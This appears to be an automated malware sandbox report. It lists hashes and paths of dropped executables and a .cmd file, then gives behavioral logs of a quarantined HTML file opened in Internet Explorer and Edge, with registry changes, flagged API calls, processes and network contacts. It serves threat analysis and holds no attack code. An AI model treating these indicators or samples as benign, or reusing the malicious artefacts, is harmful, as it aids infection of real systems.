SHA512 369588d114220ec4628721da318dfc4f36c7c0111f5f51c762af99a8eb5d0758788828a83fed790ddd7bc6a6b7c4d71dcd58eca1e6b39c9c1e0df5a0ad43e1a7

memory/3028-1026-0x0000000000D30000-0x0000000000D66000-memory.dmp

memory/3028-1027-0x00000000010A0000-0x00000000010E1000-memory.dmp

memory/3028-1028-0x0000000001140000-0x0000000001215000-memory.dmp

memory/1952-1031-0x0000000000C20000-0x0000000000CB6000-memory.dmp

memory/1952-1032-0x0000000000440000-0x0000000000476000-memory.dmp

memory/1952-1033-0x00000000004A0000-0x000000000052C000-memory.dmp

memory/1952-1034-0x000000001B530000-0x000000001B6DC000-memory.dmp

memory/1952-1035-0x0000000000530000-0x0000000000548000-memory.dmp

memory/1952-1036-0x0000000000550000-0x0000000000568000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

MD5 5487dcc2e2a5d7e109c3fd49f37a798b
SHA1 1ad449a9ef2e12d905e456f9b56f97a3d0544282
SHA256 b9be721252182d14fe65f1240fa16caa0238346b329fb6139e891f0c94c99ce5
SHA512 ee89ea43516275c73e9227dd6f26c2ceaf717928b9b376f65e891d9eb9110f6596d0c6e8f7bf78b51e0dc3a3acaba2c77d64d8b567b49943439c28344fb21845

memory/920-1049-0x0000000000AF0000-0x0000000000C60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10033420101\7axE6Jz.exe

MD5 ab118fd9c6e1c3813ff0ec7cd8c6539f
SHA1 a03967883de5cfbe96036d13eac74bbb030903ef
SHA256 57153e88e47ac7b13751e8382e021cad96481f68bfa41510ed5b402adbecd7ad
SHA512 4b119738f8843025fe8c158c02a32c1e147fdbce41671c80ef58f1daec3f555fbe0248ed7174cfdebce0c5c987b616824288e3246953a79910a5504bf27fc297

memory/39504-1070-0x0000000000100000-0x0000000000168000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

MD5 139801ec12921d4a10cade0e8bd14581
SHA1 19e4ea0a6204a9256bb2671aec86b1942d0bb63c
SHA256 8a32ddf6678734e654e2c128673789991b08f31d4c0049f168774f0b056a2796
SHA512 2d6c0a6923b278d648b20f3091cabdf889f5ae7e767675c8eb93fb23f607b1e6cb8ea891bf827932efa78dddddb32671045d2e52adac73ff764c7286bc542601

C:\Users\Admin\AppData\Local\Temp\10035810101\b92cc19684.exe

MD5 454bd2cde5257315f133cfc64bcd0351
SHA1 ccfb541cc802100b3d0bc4c4147bf0363675be2b
SHA256 61a5dd7249aa43b42abc2ce22d7937dc68c7c3748d20784cb86dd7135080d580
SHA512 da676aed2ed94912d7a8d84c670d6c49a91a3bd932cf88bfa141e8db16c358c64ecaa561ca34f53f9ead0e4fdbdd534aa380edba700f2582c9606a4ab270838f

C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FKOJY121V18ZC1KX4XFQ.temp

MD5 aed506593dd823c8790a3cedec44fd70
SHA1 216f08275f3ebc2dd40dcbab1f38632ae0893692
SHA256 2160cde95e3735f5f4012cc68bce3b5df4f5aa8d47cbc66d37f56b64cfab83f7
SHA512 58614f311911d892107ba94112df74cfc0b4002bfb0e28968d22e78238978e96a8ac279c4324d245f280ccc7fadf4512b6086d267a1515229e5ea7a2d12c16ed

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

MD5 4c3d80aa96c22ae2f7b01a904aef5ba0
SHA1 5a4fe29daf45ada28b3a03a8284dcd098d935942
SHA256 67ff99a32813cf55f119ca58c82c508a4d2d4e535fcc653fda16df801681299f
SHA512 a372cb16a04d2540802ebcfb70c731097c44ae0b9e09d7b161fda8b73d4d4b11194de0c8cb60b2d05a86140b9f4d8258125564678574fa0182e944b5ac93d204

memory/2952-1161-0x0000000004700000-0x0000000004BDE000-memory.dmp

memory/2952-1162-0x0000000004700000-0x0000000004BDE000-memory.dmp

memory/145340-1163-0x0000000000870000-0x0000000000D4E000-memory.dmp

memory/145340-1174-0x0000000000870000-0x0000000000D4E000-memory.dmp

memory/146796-1175-0x0000000000B30000-0x000000000100E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe

MD5 13426493d75b1f9244bd160de199f5c2
SHA1 ae0afd93e3ff3bc87094b4034df6cb577f52b42c
SHA256 84266b5a9333a8ae1fc7aa8ed2a43eee12a2ba1124c1e8bd733fe7ad124d7262
SHA512 6a34cf7129657d9092c5ef72f5b77794b3e30c49efed8728ca54f9aeafe74fb57025df65224a3041ec52b74394253c29c812478cf2a71eafc23ee63afc3b5d8d

Analysis: behavioral16

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20241010-en

Max time kernel

90s

Max time network

137s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c5a4498e0b12b844ac3fe9407cb9ea0a000000000200000000001066000000010000200000006549ac4f615653eb5bd2ea668e39acd2b112a711b481d7d90c468dcd4cb93e99000000000e8000000002000020000000a08f35846078cad7f4fad79193e44a55473e18d301b6a5527392e3fe862575399000000078c2ecea33c53551fdc72a97682b8f83ec10a845d19385e00f32602307d45b0139972872453c14e852cd0b58cc2cbbf65d8cd20b58b8b3a328c833048ff2a5ea14e9af33e29158eb495c965a78581d29e73f067c4932d02f5b84908b952bb1b56c50f43e071d5eac8704f32f8d4d03cede0de8a2f4af0485c649bd5e1ebf26dab0efdb6a184f6b1063772a62eb3535df400000001ef1b973d42ad7539e575f48dadf3a093df6cb5273468d6452677122445c1e8c5aa5a3d73c611404c446155cb8b9d4dc04268ac17a4258352085c3e48b3251fb C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c5a4498e0b12b844ac3fe9407cb9ea0a000000000200000000001066000000010000200000001a3c81562a3439adb5d61fb5755d4f524ffafab4f0067567f69a270cd9c867b7000000000e8000000002000020000000d288f5f8f6f9ac796d7adea3afc3e68d2c9bf9d6061476150b9c3920c990371a2000000088d2d2c453dc7f67f0a12437eb296af618507c8619396f00b5b89a853ad7b10040000000697d9ebb5b757b6de70bc70ba6ad9a6d3b767eba3952f8190af92d09a421c4fa0374a54ed3dfbd24b0626de7ed9cc99586b7ee567c98c75e28525431756069f9 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774342" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AA026B1-F499-11EF-B66C-7E31667997D6} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b01d891fa688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1268 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab8BDE.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Cab8D28.tmp

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar8D5B.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 74d6f818a8ee868b805c3150db7b202e
SHA1 c5680e4c1f0d15fc35a85f431f875348e00b9c42
SHA256 43bec25a2409e9e72d90210652e30f8bc5af87392e761f99e29612733eb83070
SHA512 468ec373b565ce5612ea6e4aecdba302966f0989a728177d2b8f05ef9e95b4bd645abe368524a9eead7fb618ed202440c9bdd272403e5a18776d7ed3ed9f2642

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 618a7bc75348bd0822db78498308f443
SHA1 a5364c63caba42c96a35fbd07f6b1fd132b74954
SHA256 f2091af2c7fad71c5f318dd442634884ec7f04d23404018d61952960ad73fa67
SHA512 a13bff76daf6c7da90080587a2ce57ac373ec1515a8d79477b9e9dbc286bc038b114a123b83c42bed5529251099b3084267bdf59f324be5c3ec72c1de8136658

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 41e25769df61590d65ab348d00070a76
SHA1 859a2ce2b0a1694558b2248fc169835a79167eec
SHA256 547f0746c5c6f42ad0d86b25130408382bd5d1a18bd3378453df7c2b06f559dd
SHA512 f3081050569a2b7270044386abd264a72d768717368eaaa17f51438070b95226f261a81bbeae72bfac8483018f37d50bede3eabbff4d40948ca01ef95bd7b4ef

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1d3d542813d5cc253767e10a54c94caf
SHA1 e8283157e5e63e37024d757efc44b214b9cd1ebf
SHA256 701225ede54aee2f53f8ca8ead03bddc027731eded8f822d23d4c8ddf7a8b1ce
SHA512 62208c1a56a0c53cfad45254809dc7dd462e4559e8596faf1e720391230ad6ad9ae9b237df102186206ec32d266592d05bc86dedc58249009063df502bb64626

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7f67868e5f213626b0a2b4d1f291c7c4
SHA1 44d95bd4a417a4d3bb4a51214f186c79ce699497
SHA256 f135d08cfd6c09340cd191e831b56469bc3635d944163114c74e0320889d2ea5
SHA512 2274d05f0be146718515d110e746c562d8ba830b6d63464593d2decfc051d73c04f925d115a6db24c566720b5cf85e4c1bcda3048347ed13f54883e83c7e489e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 61ad19a336b8d7517d76611d12341253
SHA1 1c5e457d780e0851d6227cfc0f87d8754db15468
SHA256 3efe3c8db583c08adfb303934be9a506ea73b5bf516036c4b86b3d28bb944991
SHA512 627836bf8e61ae73b26657befc096b86be9a977a4407a47b06fca49e9578010a88550bba70aaca49e47c98dff4638a107bceda5bce5fdfd43a5d29d0d421b9c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 252c7f06b51f7445e02ea235c5aa6320
SHA1 23b1706aed751de6a28a74a80a1a07f5f34a7476
SHA256 c97ee628b47bf8aba12cdee4757cb2488a4401b9967b08136a018f9c829ba1af
SHA512 a7dab346c88004c47bc9c447896ec018c5aa7c45caac2e602877ab12053234019cea00b188356618693eed94f8119e8aa40263ee9373dc669062426637b54c1b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c3066d4ee42ae6818586ac8e5fa73cb
SHA1 8c8d4019201a03e5f229c3d393925dc3b0d75982
SHA256 479ddbff1fc776e144cdc27324efd25ff145e0fe3bf810aa16bd9ff0d5da106b
SHA512 4a2faa3fd6598633885d5ceb399da96613bd24b67137097abb32f08e316992ffb0d66057000875129dce691561e44d40a48879d92198e3b3a0acae526c71fdc6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a6b2dc49dda314745a1eb7386f1db948
SHA1 929510267096fbfffd9de695ddf7a8f306e18459
SHA256 11a402830ce22d5262014eb7d3b63bef4401a16a18d52c6f7b9b46cfaef3f025
SHA512 13eb1f477e64c0bfc00f09f403132373e42d8d68141dddf71f0ebd5bef4acc860b250a4c84c42e0e699549a8b2fd37790d9a5a991bad792ca4d06e229132b85d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0f0d56d17be620a29ae3d7a744c66db0
SHA1 98fe169ee27bf727b99f7460736f694cdeaec8ee
SHA256 3d0e83d8bb92245a2b8af9b8376a19fcf337aca14b6a0e8b3fec4093bbb8e10e
SHA512 11b352cf8ef2b6ddae4756c75c08a835e1970291856ae81670f530b361a88f281fa9e9c6a21cc208b0db7a3c8ab4461097fd7dbb336dcfc8a0e43ac95a024f9b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a51a7724ec10acce569195f13c2a6375
SHA1 f68fe782f27ca62727cc3b92ff738f67305173d7
SHA256 3d3842eb7cffe5b4ab15cd93d8ca7e2578a3e4e3473bbdac7f728bdc642b0dad
SHA512 aca36893d06b770f6447f65437a8e413a78194c893d9ee584d61a80594ab775ce8e202eb46029d96f302b7c6f9954c3fed5ab984912066fd5ca1ce6177575a79

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3014a4db4441054a9f855084bc34749a
SHA1 8d4cb94f20efef927f464407e6946de934748aef
SHA256 2f9debc95fb56eb879ab98ddbc457bfc9c2dc79b533bf08dceb71c71e6ad5cfd
SHA512 ee898bc30a7f02af6a898d488974f6bf8da65639135ff7028fb86346abfd3fc0dc5ad712daedc4e9c2287a3f62b523b0ab0177db93e83beb4c80e01b1d136f7f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 57fea08146178e608a209293ff1be0b4
SHA1 f0cbb7ec3528952f8c7f9bb9c8d3394d61f3b0ee
SHA256 bd73c4ff12884a0f4270a3b91b4b4dc310d9336e9ceb1ca71bb9c0a8372e86c0
SHA512 8cf055fcf6d984dc758fe6420b577b02cb540bd455e89e50f0bac24000ccceea177f1599e5acf88e85e40617c30305f7d737a206d065d4a3970822d17f792fca

Analysis: behavioral17

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

131s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 4064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 4064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
